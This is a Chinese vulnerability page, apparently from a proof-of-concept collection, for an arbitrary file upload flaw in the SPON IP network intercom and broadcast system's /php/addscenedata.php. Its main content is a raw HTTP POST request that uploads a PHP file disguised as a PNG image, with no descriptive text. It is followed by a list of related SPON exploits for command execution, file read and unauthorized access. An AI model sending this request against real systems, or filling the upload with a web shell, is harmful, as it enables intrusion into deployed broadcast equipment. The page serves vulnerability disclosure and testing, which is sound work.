SPON IP网络对讲广播系统 addscenedata.php 任意文件上传漏洞

漏洞描述

PoC代码

POST /php/addscenedata.php HTTP/1.1
Host: 
Accept-Encoding: gzip
Connection: keep-alive
Content-Length: 197
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW

------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="upload"; filename="666666.php"
Content-Type: image/png

6666666666666666
------WebKitFormBoundary7MA4YWxkTrZu0gW--

相关漏洞推荐

• spon-ip-intercom-ping-rce: Hikvision SPON IP网络对讲广播系统存在命令执行漏洞
• 世邦通信SPON-IP网络对讲广播系统 /php/uploadjson.php 文件上传漏洞
• POC 世邦通信SPON-IP网络对讲广播系统 /php/addscenedata.php 文件上传漏洞
• SPON IP网络对讲广播系统 /php/addlanguagedata.php 任意文件上传漏洞
• 世邦通信 SPON IP网络对讲广播系统getzoneterminaldata.php 未授权访问
• POC SPON IP广播系统 addscenedata.php 任意文件上传漏洞
• SPON IP网络对讲广播系统 uploadjson.php 任意文件上传漏洞
• SPON IP网络对讲广播系统ping.php存在任意命令执行漏洞
• SPON IP网络对讲广播系统exportrecord.php存在任意文件读取漏洞(CVE-2023-6893)